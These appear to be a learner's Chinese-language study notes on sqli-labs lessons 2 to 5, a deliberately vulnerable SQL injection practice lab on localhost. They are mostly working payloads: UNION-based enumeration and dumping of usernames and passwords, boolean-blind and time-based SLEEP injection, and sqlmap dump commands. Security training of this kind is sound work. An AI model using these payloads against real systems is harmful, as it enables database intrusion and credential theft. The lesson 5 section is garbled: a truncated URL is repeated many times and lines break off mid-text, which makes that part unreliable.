sqli-labs学习笔记 DAY2

DAY2

sqli-labs lesson 2

• 手工注入
  • URL:http://localhost/sqli-labs-master/Less-2/
  • Parameter:id
  • 注入点检测:id=2;–+
  • 回显点检测:id=2+UNION+SELECT+1,2,3;–+
  • 字段数猜解:id=2+ORDER+BY+3;–+
  • 获取当前数据库:id=99+UNION+SELECT+1,database(),3;–+
  • 获取security数据库的表:id=99+UNION+SELECT+1,group_concat(table_name),3+FROM+information_schema.tables+WHERE+table_schema=‘security’;–+
  • 获取users表的字段:id=99+UNION+SELECT+1,group_concat(column_name),3+FROM+information_schema.columns+WHERE+table_schema=‘security’+AND+table_name=‘users’;–+
  • 获取users表的记录:id=99+UNION+SELECT+1,group_concat(username),group_concat(password)+FROM+security.users;–+
• sqlmap
  • 命令:python sqlmap.py
  • 注入点检测：python sqlmap.py -u http://localhost/sqli-labs-master/Less-2/?id=0
  • 获取当前数据库:python sqlmap.py -u http://localhost/sqli-labs-master/Less-2/?id=0 --current-db
  • 获取数据库所有表:python sqlmap.py -u http://localhost/sqli-labs-master/Less-2/?id=0 -D security --tables
  • 获取users表所有字段:python sqlmap.py -u http://localhost/sqli-labs-master/Less-2/?id=0 -D security -T users --columns
  • 获取users表所有记录:python sqlmap.py -u http://localhost/sqli-labs-master/Less-2/?id=0 -D security -T users -C username,password --dump

sqli-labs lesson 3

• 手工注入
  • URL:http://localhost/sqli-labs-master/Less-3/
  • Parameter:id
  • 该题与lesson 2相同，只不过在单引号后面加一个)。这一点可以通过利用上一题的检测方法检测时的报错知晓。
• sqlmap
  • 与上一题完全相同

sqli-labs lesson 4

• 手工注入
  • URL:http://localhost/sqli-labs-master/Less-4/
  • Parameter:id
  • 该题与lesson 2相同，只不过在单引号换成双引号。这一点可以通过利用上一题的检测方法检测时的报错知晓。
• sqlmap
  • 同lesson 2

sqli-labs lesson 5

• 手工注入
  • URL:http://localhost/sqli-labs-master/Less-5/
  • Parameter:id
  • 布尔型注入
    • 检测：http://localhost/sqli-labs-master/Less-5/?id=1’+AND+0;--+
    • 说明：如果存在注入点，网页返回与id=1的结果不同，如果把0改成1，则相同
    • sql的if函数：if(CONDITION, A, B) 条件成立，返回A，否则返回B
    • 长度函数：length(STRING)
    • 字符串截取
    • 检测数据库名长度：http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(length(database())=n,1,0);–+
      • 也可以用不等号来进行二分法猜解
    • 猜测数据库名：http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a’,1,0);–+
      • left()函数：left(STRING, LENGTH)返回字符串左边LENGTH个字符
      • substring(string, pos, length)返回字符串string从pos开始的length长度的子字符串
      • 也可以使用ascii()函数把字符转成ascii来二分法猜解

    http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

    • 可以借助Burpsuit实现半自动化简化过程，通过返回网页的长度来判断返回值
      
      

    http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

  http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

  • http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a利用延迟来注入
    http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a
    • http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a检测：http://localhost/sqli-labs-master/Less-5/?id=1’+AND+SLEEP(5);--+
    • 说明：如果存在注入点，网页的返回会延迟5S，可以通过开发者工具观察返回时间的变化
    • sql的if函数：if(CONDITION, A, B) 条件成立，返回A，否则返回B
    • 长度函数：length(STRING)
    • 字符串截取
    • 检测数据库名长度：http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(length(database())=n,SLEEP(5),1);–+
      • 也可以用不等号来进行二分法猜解
    • 猜测数据库名：http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a’,SLEEP(5),1);–+

    http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

    • 字段数、表名等语法类似

    http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

  http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

  http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a

• sqlmap
  • 同lesson 2

http://localhost/sqli-labs-master/Less-5/?id=1’+AND+if(left(database(),1)=" a